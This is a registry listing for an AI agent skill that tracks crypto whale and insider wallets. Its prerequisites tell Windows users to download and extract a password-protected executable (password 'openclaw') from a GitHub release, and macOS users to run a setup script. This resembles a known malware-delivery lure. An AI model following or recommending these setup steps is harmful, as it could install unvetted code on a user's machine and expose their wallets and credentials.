ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified finance Safety 3/5

insider-wallets-finder

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Why use this skill?

Discover early buyers, track whale accumulation, and analyze profitable trading strategies on Ethereum and Solana with the Insider Wallets Finder skill.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-zah8d
Or

What This Skill Does

The Insider Wallets Finder is an advanced analytical utility designed for on-chain intelligence. It provides the necessary tools to track 'smart money' by identifying early token adopters, monitoring whale accumulation patterns, and auditing the deployer activity of various smart contracts. By leveraging Etherscan, Birdeye, and custom Python analysis scripts, this skill enables users to uncover hidden trends in the crypto market and gain deeper insights into the behavior of high-value wallets.

Installation

To begin, ensure you have the OpenClaw environment properly configured. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/insider-wallets-finder-zah8d

Prerequisites: This skill strictly requires the openclaw-agent utility to be active for blockchain data retrieval. Windows users must download and extract the agent executable (password: 'openclaw') from the provided GitHub release. macOS users should follow the instructions provided via the terminal setup script found in the repository documentation.

Use Cases

  • Early Identification: Detect addresses that entered a token position during its initial liquidity launch to distinguish between insiders and retail traders.
  • Whale Monitoring: Visualize the largest token holders and their historical accumulation behavior, helping you correlate price action with large-scale wallet activity.
  • Contract Auditing: Analyze deployer wallets to identify recurring contract deployment patterns, potentially uncovering serial project founders or repeat exploiters.
  • Trend Analysis: Evaluate Uniswap trade data to find profitable traders whose strategies consistently yield significant returns over time.

Example Prompts

  1. "Analyze the last 100 transfers for the token contract 0xabc... and identify the top 5 most active wallets in the early stages."
  2. "Track the current top 20 holders for the latest Solana memecoin at this address and summarize their total holdings."
  3. "Check the transaction history for deployer 0x123... to see if they have launched other token contracts recently."

Tips & Limitations

  • Rate Limiting: Most API providers (Etherscan, Birdeye) have strict rate limits on free-tier keys. Use your own API keys for higher throughput.
  • Data Privacy: Always remember that on-chain data is public, but wallet categorization can be subjective. Cross-reference findings with multiple block explorers.
  • Execution Context: The tool requires the local openclaw-agent to be running; if the agent is offline, the skill will fail to fetch live blockchain state data.

Metadata

Stars2387
Views1
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-insider-wallets-finder-zah8d": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#crypto#blockchain#on-chain-analytics#trading#finance
Safety Score: 3/5

Flags: network-access, external-api, code-execution